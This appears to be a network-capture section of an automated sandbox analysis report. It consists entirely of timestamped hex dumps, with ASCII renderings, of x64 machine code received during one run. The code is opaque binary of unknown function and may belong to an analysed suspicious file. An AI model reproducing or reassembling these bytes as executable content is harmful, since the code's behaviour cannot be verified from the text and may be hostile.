83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 8b c2 48 83 c1 34 49 8b d1 e9 91 18 01 00 cc cc cc cc cc cc cc cc cc Data Ascii: "HcKAHHw@A@9+H?wHH@@yHpC6HcKHHcHw*H?wHAHQ,DD[LHcKHHUsHcCH3HH\$0Hl$8Ht$@H _LH4I
2023-11-18 09:02:42 UTC	8906	IN	Data Raw: 5f c3 48 89 3a eb e7 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 01 48 8b fa 48 8b d9 83 b8 88 00 00 00 00 7e 54 4c 8b 1a 4d 85 db 74 4c 48 63 49 10 33 d2 4d 8b 53 08 4d 63 c0 4b 8d 04 10 48 f7 f1 33 d2 4c 8b c8 49 8b c2 48 f7 f1 4b 8d 0c 10 48 8b d7 45 8b 43 14 44 2b c8 49 89 4b 08 48 8b 0b 44 0f af 43 10 45 0f af c1 44 8b 89 88 00 00 00 48 8b cb e8 20 00 00 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 57 41 54 41 56 41 57 48 83 ec 20 48 8b 3a 45 33 f6 44 89 44 24 60 45 8b e1 48 89 7c 24 58 4c 8b fa 48 8b e9 45 85 c0 0f 8e e0 00 00 00 48 89 5c 24 50 48 89 74 24 68 0f 1f 80 00 00 00 00 83 7d 34 00 0f 85 a8 00 00 00 44 8b 57 14 33 f6 33 db 45 33 c9 33 c9 45 33 Data Ascii: _H:H\$WH HHH~TLMtLHcI3MSMcKH3LIHKHECD+IKHDCEDH H\$0H _@UWATAVAWH H:E3DD$`EH\|$XLHEH\$PHt$h}4DW33E33E3
2023-11-18 09:02:42 UTC	8910	IN	Data Raw: 48 8b 01 48 8b f2 33 d2 41 8b d8 48 8b f9 48 8b ce 8b a8 84 00 00 00 44 8d 42 78 83 c5 14 e8 83 c2 fc ff 41 b8 01 00 00 00 89 1e 48 8b d6 48 8b cf e8 b0 0c 00 00 48 8d 56 20 c7 46 08 01 00 00 00 c6 46 4a 01 c7 46 70 01 00 00 00 39 6a 0c 73 0c 48 8d 4f 34 44 8b c5 e8 89 fb 00 00 39 6e 1c 73 10 48 8d 4f 34 44 8b c5 48 8d 56 10 e8 74 fb 00 00 48 83 7f 50 00 75 26 48 8b 17 48 8d 0d eb 43 13 00 4c 8b 42 10 48 8b 52 08 e8 c6 3a 11 00 4c 8b c0 48 8d 57 50 48 8b cf e8 07 68 00 00 83 7f 34 00 75 1e 48 8b 46 10 33 c9 89 08 8d 51 01 4c 63 06 c7 46 18 04 00 00 00 48 8b 4f 50 e8 63 0a 0e 00 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 83 79 34 00 48 8b da 48 89 6c 24 30 48 89 74 24 38 49 8b Data Ascii: HH3AHHDBxAHHHV FFJFp9jsHO4D9nsHO4DHVtHPu&HHCLBHR:LHWPHh4uHF3QLcFHOPcH\$0Hl$8Ht$@H\|$HH A^@SH y4HHl$0Ht$8I
2023-11-18 09:02:42 UTC	8916	IN	Data Raw: 89 42 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 57 48 83 ec 30 48 8b 42 68 48 8b f9 4c 8b 51 30 48 89 01 4c 8b 4a 10 48 8b 4a 20 4c 63 42 70 4c 03 c1 49 63 41 0c 4c 3b c0 7f 2c 4d 8b 01 4c 03 c1 c7 47 28 00 00 00 00 48 8b 4f 18 44 8b 4a 70 48 83 c1 34 49 8b d2 48 89 7c 24 20 e8 be 02 00 00 48 83 c4 30 5f c3 48 8b 4f 18 4c 8d 4f 20 4d 8b c2 48 89 5c 24 40 c7 47 28 00 00 00 00 e8 0c 04 00 00 48 8b 47 20 48 8b 5c 24 40 48 89 47 08 8b 47 28 89 47 10 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 48 63 4a 70 48 8b 52 20 4c 8b 4e 10 4c 8d 04 0a 49 63 41 0c 4c 3b c0 7e 40 48 8b 4f 18 4c 8d 4f 20 45 33 c0 48 8b d6 44 89 47 28 4c 8b 47 30 e8 97 03 00 00 Data Ascii: B8@WH0HBhHLQ0HLJHJ LcBpLIcAL;,MLG(HODJpH4IH\|$ H0_HOLO MH\$@G(HG H\$@HGG(GH0_H\$Ht$WH HHHcJpHR LNLIcAL;~@HOLO E3HDG(LG0
2023-11-18 09:02:42 UTC	8922	IN	Data Raw: 40 4c 8b f1 4c 8b 41 58 48 63 da 99 2b c2 d1 f8 4d 8d 3c 98 3b d8 7c 09 2b d8 03 db 8d 7b 01 eb 16 8d 0c 1b 48 63 c1 41 0f b7 1c 80 8d 41 01 48 63 c8 41 0f b7 3c 88 48 63 c3 48 6b e8 78 48 63 c7 48 6b f0 78 49 03 ee 41 c6 47 02 00 49 03 f6 48 83 7d 70 00 0f 84 9e 00 00 00 48 83 7e 70 00 75 07 8b fb e9 90 00 00 00 8b 86 c0 00 00 00 4c 89 6c 24 40 44 8b ad c0 00 00 00 44 3b e8 41 0f 4c c5 85 c0 7e 1c 48 8b 96 b8 00 00 00 48 8b 8d b8 00 00 00 4c 63 c0 e8 fa f7 fd ff 8b c8 85 c0 75 09 41 8b cd 2b 8e c0 00 00 00 4c 8b 6c 24 40 85 c9 75 42 41 c6 47 02 01 48 8b 8d c8 00 00 00 48 8b 96 c8 00 00 00 48 3b ca 75 11 0f b6 8e d4 00 00 00 8b c7 88 8d d4 00 00 00 eb 22 33 c0 48 3b ca b9 01 00 00 00 0f 9f c0 83 ca ff 41 3b 46 44 0f 44 ca 85 c9 0f 48 fb 66 41 89 3f 33 c0 Data Ascii: @LLAXHc+M<;\|+{HcAAHcA<HcHkxHcHkxIAGIH}pH~puLl$@DD;AL~HHLcuA+Ll$@uBAGHHH;u"3H;A;FDDHfA?3
2023-11-18 09:02:42 UTC	8933	IN	Data Raw: 80 e7 7f 88 01 40 88 79 01 b8 02 00 00 00 eb 08 48 8b d7 e8 ee 98 fe ff 03 f0 41 ff c4 49 83 c7 0c 45 3b 65 1c 0f 8c fb fd ff ff 4c 8b bc 24 80 00 00 00 8b 94 24 90 00 00 00 41 bc 00 00 00 00 48 8b 84 24 98 00 00 00 ff c2 4c 8b ac 24 88 00 00 00 48 ff c0 89 94 24 90 00 00 00 48 89 84 24 98 00 00 00 41 3b 55 14 0f 8c 58 fc ff ff 44 8b ce 4d 8b c6 ba 0a 00 00 00 49 8b cf e8 75 0c 00 00 4c 8b 7c 24 38 4c 8b 6c 24 40 4c 8b 64 24 48 48 8b 7c 24 50 48 8b 74 24 58 48 8b 6c 24 60 48 8b 5c 24 68 4d 85 f6 74 67 83 3d 36 9d 15 00 00 74 4e 48 8b 0d ed d2 15 00 48 85 c9 74 06 ff 15 a2 9d 15 00 49 8b ce ff 15 51 9d 15 00 48 ff 0d 9a d3 15 00 49 8b ce 48 63 d0 48 29 15 45 d3 15 00 ff 15 27 9d 15 00 48 8b 0d b8 d2 15 00 48 85 c9 74 1d 48 83 c4 70 41 5e 48 ff 25 76 9d 15 Data Ascii: @yHAIE;eL$$AH$L$H$H$A;UXDMIuL\|$8Ll$@Ld$HH\|$PHt$XHl$`H\$hMtg=6tNHHtIQHIHcH)E'HHtHpA^H%v
2023-11-18 09:02:42 UTC	8936	IN	Data Raw: 74 18 ff 15 1e 93 15 00 eb 09 48 8b cb ff 15 ab 92 15 00 48 8b 0d 3c c8 15 00 ff c6 49 83 c6 10 3b 77 14 7c 92 4c 8b 74 24 40 48 8b 5c 24 30 48 8b cf e8 bf 04 11 00 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 8d 42 01 48 63 f2 4c 63 c0 48 8b d6 49 c1 e0 25 48 8b d9 49 ff c8 48 c1 e2 25 e8 72 00 00 00 48 83 7b 58 00 75 26 48 8b 13 48 8d 0d 69 dd 12 00 4c 8b 42 10 48 8b 52 08 e8 e4 d4 10 00 4c 8b c0 48 8d 53 58 48 8b cb e8 25 02 00 00 83 7b 34 00 75 26 48 8b 4b 58 4c 8b c6 ba 01 00 00 00 e8 8e a4 0d 00 48 8b 4b 58 e8 f5 b5 0d 00 48 8b 4b 58 e8 0c c8 0d 00 89 43 34 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc 48 89 6c 24 10 48 89 74 24 Data Ascii: tHH<I;w\|Lt$@H\$0HHt$8H _H\$Ht$WH BHcLcHI%HIH%rH{Xu&HHiLBHRLHSXH%{4u&HKXLHKXHKXC4H\$0Ht$8H _Hl$Ht$
2023-11-18 09:02:42 UTC	8952	IN	Data Raw: 89 42 18 33 c0 41 39 40 10 0f 94 c0 89 42 08 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 41 55 48 83 ec 40 48 8b 42 20 4c 8b ea 48 89 5c 24 58 4c 8b d9 48 89 7c 24 38 33 db 4c 89 64 24 30 44 8b d3 48 8b 78 18 45 8b e0 48 83 c7 20 89 5a 08 4c 89 7c 24 20 4d 8b f9 48 39 5f 18 0f 84 e4 00 00 00 44 8b 49 18 44 8b c3 48 89 6c 24 60 48 8b cf 48 89 74 24 68 8d 6b 01 4c 89 74 24 28 44 8b f3 0f 1f 84 00 00 00 00 00 48 8b 41 10 38 58 14 75 1b 48 8b 10 45 85 c0 74 0d 49 3b d6 8b c3 0f 9c c0 44 3b c8 74 06 4c 8b f2 44 8b c5 48 8b 49 18 48 85 c9 75 d3 0f 1f 00 48 8b 77 10 38 5e 14 75 61 48 8b 0e 49 3b ce 74 19 45 85 e4 74 10 49 3b cf 74 0b 8b c3 0f 9f c0 41 3b 43 18 74 04 8b eb eb 40 48 8b 4e 18 48 8b d6 45 85 e4 74 0a 4d 8b c7 Data Ascii: B3A9@B3HL$AUH@HB LH\$XLH\|$83Ld$0DHxEH ZL\|$ MH9_DIDHl$`HHt$hkLt$(DHA8XuHEtI;D;tLDHIHuHw8^uaHI;tEtI;tA;Ct@HNHEtM
2023-11-18 09:02:42 UTC	8968	IN	Data Raw: e8 61 13 00 00 44 8b 7c 24 30 49 89 45 48 41 8b c7 e9 65 04 00 00 41 c7 45 40 01 00 00 00 41 8b c7 e9 55 04 00 00 48 ff c7 44 38 34 3b 75 f7 48 ff c7 48 8d 34 fd 00 00 00 00 e8 97 e5 04 00 85 c0 74 05 4d 8b e6 eb 1a 48 85 f6 74 0d 48 8b ce e8 71 86 10 00 4c 8b e0 eb 03 4d 8b e6 4d 85 e4 75 0d 48 85 f6 7e 15 41 bf 07 00 00 00 eb 0d 4c 8b c6 33 d2 49 8b cc e8 5a dc fb ff 48 03 ff 49 8b ee 45 85 ff 75 38 e8 4a e5 04 00 85 c0 75 15 48 85 ff 74 0b 48 8b cf e8 29 86 10 00 48 8b e8 48 85 ed 75 0d 48 85 ff 7e 15 41 bf 07 00 00 00 eb 0d 4c 8b c7 33 d2 48 8b cd e8 17 dc fb ff 48 8b f5 4d 85 e4 0f 84 cf 00 00 00 48 85 ed 0f 84 c6 00 00 00 4d 39 75 68 74 0c 48 8d 0d fd 58 12 00 e9 a1 00 00 00 48 85 db 0f 84 91 00 00 00 49 bf 21 00 00 00 00 00 00 42 0f b6 03 84 c0 0f Data Ascii: aD\|$0IEHAeAE@AUHD84;uHH4tMHtHqLMMuH~AL3IZHIEu8JuHtH)HHuH~AL3HHMHM9uhtHXHI!B
2023-11-18 09:02:42 UTC	8972	IN	Data Raw: 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c7 41 08 00 00 00 00 c3 cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 48 8b 09 e8 af 71 10 00 33 c0 48 89 03 48 89 43 08 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 4c 89 44 24 18 4c 89 4c 24 20 53 48 83 ec 20 83 39 00 48 8b c2 48 8b d9 75 1e 48 8d 54 24 40 48 8b c8 e8 44 42 10 00 48 85 c0 75 0e c7 03 07 00 00 00 48 83 c4 20 5b c3 33 c0 48 83 c4 20 5b c3 cc cc cc cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89 4c 24 20 53 56 48 83 ec 28 83 39 00 48 8b f2 48 8b d9 75 47 48 8d 54 24 58 48 89 7c 24 20 49 8b c8 e8 f3 41 10 00 48 8b f8 48 85 c0 75 12 c7 03 07 00 00 00 48 8b 7c 24 20 48 83 c4 28 5e 5b c3 4c 8b c7 48 8b d6 48 8b cb e8 1b 00 00 00 48 8b cf e8 Data Ascii: H _A@SH HHq3HHCH [HT$LD$LL$ SH 9HHuHT$@HDBHuH [3H [LD$LL$ SVH(9HHuGHT$XH\|$ IAHHuH\|$ H(^[LHHH
2023-11-18 09:02:42 UTC	8984	IN	Data Raw: 00 00 33 c0 48 8b 5c 24 30 48 83 c4 20 5f c3 b8 07 00 00 00 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc 40 53 48 83 ec 20 83 79 28 00 48 8b d9 75 16 48 8b 41 08 48 85 c0 74 0d 48 8b 09 ff d0 48 c7 43 08 00 00 00 00 48 8b 4b 20 e8 52 44 10 00 48 8b 4b 10 e8 49 44 10 00 48 8b cb 48 83 c4 20 5b e9 3c 44 10 00 cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b 41 20 48 8b d9 83 78 28 00 74 0b b8 01 00 00 00 48 83 c4 20 5b c3 48 8b 40 10 48 8b 49 18 48 89 74 24 30 ff 90 b0 00 00 00 8b f0 85 c0 0f 84 86 00 00 00 48 89 7c 24 38 48 8b 7b 10 48 85 ff 74 5b 83 3d 80 d1 14 00 00 74 49 48 8b 0d 37 07 15 00 48 85 c9 74 06 ff 15 ec d1 14 00 48 8b cf ff 15 9b d1 14 00 48 ff 0d e4 07 15 00 48 8b cf 48 63 d0 48 29 15 8f 07 15 00 ff 15 71 d1 14 00 48 8b Data Ascii: 3H\$0H _H\$0H _@SH y(HuHAHtHHCHK RDHKIDHH [<D@SH HA Hx(tH [H@HIHt$0H\|$8H{Ht[=tIH7HtHHHHcH)qH
2023-11-18 09:02:42 UTC	8995	IN	Data Raw: f6 44 88 74 24 20 e8 1b 7f 09 00 48 85 c0 74 0a 44 38 73 02 74 04 83 48 04 20 ff c6 48 83 c3 18 83 fe 2a 0f 82 5d ff ff ff 41 8b f6 48 8d 1d db ac 12 00 0f 1f 00 0f b6 4b f1 49 8b d6 83 e9 01 74 0b 83 f9 01 75 09 48 83 ca ff eb 03 48 8b d7 48 8b 03 41 b9 01 00 00 00 44 0f be 43 f0 48 8b cf 4c 89 74 24 50 4c 89 74 24 48 4c 89 74 24 40 48 89 44 24 38 48 8b 43 f8 48 89 44 24 30 4c 89 74 24 28 48 89 54 24 20 48 8b 53 e8 e8 85 50 04 00 ff c6 48 83 c3 20 83 fe 06 72 9a 4c 8d 5c 24 60 33 c0 49 8b 5b 10 49 8b 6b 18 49 8b 73 20 49 8b 7b 28 49 8b e3 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b 01 48 8b d9 48 8b 48 28 e8 6b 68 04 00 48 63 c8 ba 00 24 00 00 48 8b 03 66 85 50 08 74 10 48 8b d1 48 8b c8 48 83 c4 20 5b e9 fa 6d 0d 00 48 89 08 Data Ascii: Dt$ HtD8stH H*]AHKItuHHHADCHLt$PLt$HLt$@HD$8HCHD$0Lt$(HT$ HSPH rL\$`3I[IkIs I{(IA^@SH HHHH(khHc$HfPtHHH [mH
2023-11-18 09:02:42 UTC	9011	IN	Data Raw: 8d 15 c0 67 12 00 49 8b 08 0f b7 41 08 83 e0 3f 80 3c 10 05 0f 84 b0 00 00 00 0f b7 41 08 0f 29 74 24 30 a8 08 74 06 f2 0f 10 31 eb 1f a8 24 74 0a 0f 57 f6 f2 48 0f 2a 31 eb 11 a8 12 74 0a e8 12 34 0d 00 0f 28 f0 eb 03 0f 57 f6 e8 4d 81 fb ff c7 00 00 00 00 00 e8 42 81 fb ff 83 38 00 75 1d 0f 28 c6 e8 51 37 fb ff 48 8b 0f 0f 28 c8 0f 28 74 24 30 48 83 c4 40 5f e9 78 2d 0d 00 48 89 5c 24 50 e8 16 81 fb ff 48 63 18 e8 0e 81 fb ff 8b 08 e8 c7 ba fb ff b9 01 00 00 00 48 c7 44 24 20 ff ff ff ff 89 4f 24 44 0f b6 c9 48 8b 0f 4c 8b c3 48 8b d0 e8 6c 28 0d 00 48 8b 5c 24 50 0f 28 74 24 30 48 83 c4 40 5f c3 48 8b 07 b9 00 24 00 00 66 85 48 08 74 0d 48 8b c8 48 83 c4 40 5f e9 71 35 0d 00 b9 01 00 00 00 66 89 48 08 48 83 c4 40 5f c3 cc cc cc cc cc cc cc cc cc cc cc Data Ascii: gIA?<A)t$0t1$tWH*1t4(WMB8u(Q7H((t$0H@_x-H\$PHcHD$ O$DHLHl(H\$P(t$0H@_H$fHtHH@_q5fHH@_
2023-11-18 09:02:42 UTC	9012	IN	Data Raw: 8b c3 48 8b d0 e8 3c 25 0d 00 48 8b 5c 24 50 0f 28 74 24 30 48 83 c4 40 5f c3 48 8b 07 b9 00 24 00 00 66 85 48 08 74 0d 48 8b c8 48 83 c4 40 5f e9 41 32 0d 00 b9 01 00 00 00 66 89 48 08 48 83 c4 40 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 0f b6 11 4c 8d 15 d6 01 fb ff 4c 8d 49 01 42 0f b6 8c 12 20 0a 17 00 44 8b c1 41 83 e8 01 74 2d 41 83 e8 01 74 1b 41 83 e8 01 74 09 41 83 f8 01 74 5a 8b c2 c3 41 0f b6 01 c1 e2 06 03 d0 49 ff c1 41 0f b6 01 c1 e2 06 03 d0 49 ff c1 41 0f b6 01 48 8d 0c 8d 00 00 00 00 c1 e2 06 42 2b 94 11 88 ea 16 00 03 d0 42 85 94 11 28 33 17 00 74 1c 8b c2 25 00 f8 ff ff 3d 00 d8 00 00 74 0e 8b c2 83 e0 fe 3d fe ff 00 00 8b c2 75 05 b8 fd ff 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec Data Ascii: H<%H\$P(t$0H@_H$fHtHH@_A2fHH@_LLIB DAt-AtAtAtZAIAIAHB+B(3t%=t=uH\$WH
2023-11-18 09:02:42 UTC	9023	IN	Data Raw: c1 e8 10 45 8b 9c 8c 10 2f 17 00 0f b6 c8 41 8b 84 8c 20 5d 17 00 4c 33 d8 48 8b c3 48 c1 e8 18 41 8b 84 84 00 ff 16 00 4c 33 d8 0f b6 c2 41 8b 84 84 40 04 17 00 4c 33 d8 41 8b 86 b4 00 00 00 4c 33 d8 48 8b c2 48 c1 e8 10 0f b6 c8 48 8b c3 48 c1 e8 08 48 c1 eb 10 48 c1 ea 18 45 8b 8c 8c 20 5d 17 00 0f b6 c8 41 8b 84 8c 10 2f 17 00 4c 33 c8 49 8b c2 48 c1 e8 18 41 8b 84 84 00 ff 16 00 4c 33 c8 40 0f b6 c6 48 c1 ee 08 41 8b 84 84 40 04 17 00 4c 33 c8 41 8b 86 bc 00 00 00 4c 33 c8 0f b6 c3 45 8b 84 84 20 5d 17 00 40 0f b6 c6 41 8b 84 84 10 2f 17 00 4c 33 c0 41 8b 84 94 00 ff 16 00 4c 33 c0 41 0f b6 c2 41 8b 84 84 40 04 17 00 4c 33 c0 41 8b 86 b0 00 00 00 4c 33 c0 49 8b c0 48 c1 e8 08 0f b6 c8 49 8b c1 48 c1 e8 10 41 8b b4 8c 10 2f 17 00 0f b6 c8 41 8b 84 8c Data Ascii: E/A ]L3HHAL3A@L3AL3HHHHHHE ]A/L3IHAL3@HA@L3AL3E ]@A/L3AL3AA@L3AL3IHIHA/A
2023-11-18 09:02:42 UTC	9039	IN	Data Raw: 8b 6c 24 30 48 8b 7c 24 70 4c 8b 7c 24 20 48 83 c4 40 5e 5d 5b c3 8b 44 24 60 eb de 33 c0 48 83 c4 40 5e 5d 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 30 48 8b c2 48 8d 0d 50 36 00 00 49 8b d9 48 8d 15 96 36 00 00 4d 8b c8 48 89 5c 24 20 83 78 7c 12 44 8b 40 78 48 0f 44 d1 48 8b c8 e8 2a 00 00 00 85 c0 75 1a 48 8b cb e8 9e 17 0c 00 83 f8 64 74 0d 48 8b cb 48 83 c4 30 5b e9 ac 29 0c 00 48 83 c4 30 5b c3 cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 40 4c 8b a4 24 90 00 00 00 45 33 ed 41 8b c5 41 8b dd 49 8b f1 41 8b e8 4c 8b f2 4c 8b f9 49 8b f9 0f 1f 40 00 3b dd 0f 8d 9d 00 00 00 48 85 f6 74 09 44 38 2f 0f 84 82 00 00 00 4c 8d 44 24 30 4c 89 6c 24 30 8b d3 49 8b cf 41 ff d6 4c Data Ascii: l$0H\|$pL\|$ H@^][D$`3H@^][@SH0HHP6IH6MH\$ x\|D@xHDH*uHdtHH0[)H0[H\$Hl$Ht$WATAUAVAWH@L$E3AAIALLI@;HtD8/LD$0Ll$0IAL
2023-11-18 09:02:42 UTC	9046	IN	Data Raw: 5d d7 48 8b 4e 38 4d 8b f7 49 c1 e6 02 33 d2 4d 8b c6 4c 89 75 cf e8 8b a3 fa ff 41 8b 44 24 78 45 33 c9 41 bd 0b 00 00 00 85 c0 0f 8e 17 0f 00 00 41 ba 01 00 00 00 44 89 55 c7 66 66 66 0f 1f 84 00 00 00 00 00 41 03 c1 48 63 c8 49 8b 84 24 90 00 00 00 48 83 3c c8 00 74 2e 41 8b c9 41 8b c1 83 e1 1f 45 85 c9 79 07 41 8d 41 1f 83 e9 20 c1 f8 05 48 63 d0 48 8b 46 38 4c 8d 04 90 41 8b c2 d3 e0 41 09 00 45 33 ed 41 8b 44 24 78 41 ff c1 44 3b c8 7c b0 45 85 ed 0f 85 a9 0e 00 00 85 db 74 27 8b c7 99 83 e2 1f 03 c2 8b c8 83 e0 1f 2b c2 c1 f9 05 48 63 d1 48 8b 4e 38 4c 8d 04 91 8b c8 41 8b c2 d3 e0 41 09 00 48 83 7e 40 00 48 8d 46 40 48 89 45 ef 0f 84 97 00 00 00 48 8b 10 4d 8b c6 48 8b 76 38 48 8b d8 48 8b ce 41 8b fa 48 8b 52 08 e8 dd 05 fc ff 85 c0 74 30 66 0f Data Ascii: ]HN8MI3MLuAD$xE3AADUfffAHcI$H<t.AAEyAA HcHF8LAAE3AD$xAD;\|Et'+HcHN8LAAH~@HF@HEHMHv8HHAHRt0f
2023-11-18 09:02:42 UTC	9057	IN	Data Raw: 33 d2 41 b8 98 00 00 00 48 8b c8 e8 56 76 fa ff 48 89 6b 10 41 8b c7 44 89 73 18 4c 89 7b 30 4c 89 7b 38 c7 43 40 01 00 00 00 89 7b 5c 44 89 7b 60 48 89 1e eb 05 b8 07 00 00 00 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 83 c4 20 41 5f 41 5e 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 48 89 7c 24 20 41 56 48 83 ec 20 45 33 f6 49 8b f0 4c 89 31 8b ea 48 8b f9 e8 d3 7e 03 00 85 c0 75 44 b9 98 00 00 00 e8 b5 1f 0f 00 48 8b d8 48 85 c0 74 32 33 d2 41 b8 98 00 00 00 48 8b c8 e8 ad 75 fa ff 48 89 73 10 41 8b c6 89 6b 18 4c 89 73 30 4c 89 73 38 c7 43 40 01 00 00 00 4c 89 73 5c 48 89 1f eb 05 b8 07 00 00 00 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc cc cc cc Data Ascii: 3AHVvHkADsL{0L{8C@{\D{`HH\$@Hl$HHt$PH A_A^_H\$Hl$Ht$H\|$ AVH E3IL1H~uDHHt23AHuHsAkLs0Ls8C@Ls\HH\$0Hl$8Ht$@H\|$HH A^
2023-11-18 09:02:42 UTC	9070	IN	Data Raw: 48 89 4e 60 e8 15 44 03 00 4c 8b bc 24 98 00 00 00 4c 8b ac 24 a8 00 00 00 48 8b bc 24 b8 00 00 00 48 8b b4 24 c0 00 00 00 48 8b 9c 24 c8 00 00 00 48 85 c0 74 09 48 8b c8 ff 15 8f 79 13 00 8b c5 48 81 c4 d0 00 00 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 48 89 74 24 20 57 48 83 ec 40 48 8b 42 20 48 8b da 48 89 44 24 28 49 8b e9 48 8b 42 18 48 8b f9 4c 8b 4a 08 49 8b f0 48 8b 51 08 8b 4b 10 48 89 44 24 20 e8 2e 02 00 00 48 85 c0 74 2e 4c 8b 43 08 48 8d 0d 5e ae 10 00 48 8b 57 08 4c 8b ce 48 89 44 24 30 48 89 6c 24 28 4c 89 44 24 20 e8 63 bb 0e 00 48 8b e8 48 85 c0 75 0a b8 07 00 00 00 e9 86 00 00 00 33 c9 48 8d 44 24 50 48 89 4c 24 30 45 33 c9 48 89 44 24 28 41 83 c8 ff 48 89 4c 24 20 48 8b d5 48 8b Data Ascii: HN`DL$L$H$H$H$HtHyH]H\$Hl$Ht$ WH@HB HHD$(IHBHLJIHQKHD$ .Ht.LCH^HWLHD$0Hl$(LD$ cHHu3HD$PHL$0E3HD$(AHL$ HH
2023-11-18 09:02:42 UTC	9086	IN	Data Raw: 5a 01 00 00 41 8b 45 20 89 43 14 eb 06 41 b8 02 02 00 00 40 f6 c5 02 74 3b 8b c7 49 8b 0c c6 48 85 c9 74 2e 0f b7 51 08 0f b7 c2 66 41 23 c0 66 41 3b c0 75 0c 44 38 79 0a 75 06 48 8b 71 10 eb 11 41 84 d7 75 0c 41 0f b6 d7 e8 bf fa 0b 00 48 8b f0 ff c7 40 f6 c5 04 74 3f 8b c7 49 8b 0c c6 0f b7 41 08 a8 08 74 06 f2 0f 10 01 eb 17 a8 24 74 0a 0f 57 c0 f2 48 0f 2a 01 eb 09 a8 12 74 10 e8 09 08 0c 00 0f 57 c9 66 0f 2e c1 7a 05 75 03 45 33 ff 44 88 7b 11 eb 04 c6 43 11 00 49 8b 4d 18 e8 08 7e 0e 00 49 8b 4d 18 48 8b f8 48 63 53 14 48 c1 e2 05 4c 8b 41 20 48 8b c8 4e 8b 04 02 48 8d 15 67 6b 10 00 e8 72 79 0e 00 48 85 f6 74 12 4c 8b c6 48 8d 15 f3 6b 10 00 48 8b cf e8 5b 79 0e 00 40 f6 c5 08 74 0f 48 8d 15 ee 6b 10 00 48 8b cf e8 46 79 0e 00 48 8b cf e8 9e 7f 0e Data Ascii: ZAE CA@t;IHt.QfA#fA;uD8yuHqAuAH@t?IAt$tWH*tWf.zuE3D{CIM~IMHHcSHLA HNHgkryHtLHkH[y@tHkHFyH
2023-11-18 09:02:42 UTC	9091	IN	Data Raw: 8b 57 18 48 8d 0d bc fe 0f 00 e8 47 67 0e 00 48 8b c8 48 8b 44 24 68 48 89 08 b8 01 00 00 00 e9 ab 00 00 00 8b f3 ba 03 00 00 00 48 8b cd e8 c3 d5 04 00 48 8d 15 7c b4 10 00 48 8b cd e8 b4 e1 04 00 8b f8 85 c0 75 7d e8 59 f7 02 00 85 c0 75 55 39 1d 0f 24 13 00 74 3a 48 8b 0d c6 59 13 00 48 85 c9 74 06 ff 15 7b 24 13 00 48 8d 54 24 20 b9 28 00 00 00 e8 8c 98 0e 00 48 8b 0d a5 59 13 00 48 85 c9 74 06 ff 15 6a 24 13 00 48 8b 5c 24 20 eb 0e b9 28 00 00 00 ff 15 e8 23 13 00 48 8b d8 48 85 db 75 07 bf 07 00 00 00 eb 18 33 c0 48 89 03 48 89 43 08 48 89 43 10 48 89 43 20 48 89 6b 18 89 73 20 48 8b 44 24 60 48 89 18 8b c7 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 8b dc 49 89 5b 10 57 48 Data Ascii: WHGgHHD$hHHH\|Hu}YuU9$t:HYHt{$HT$ (HYHtj$H\$ (#HHu3HHCHCHC Hks HD$`HH\$@Hl$HHt$PH0_LI[WH
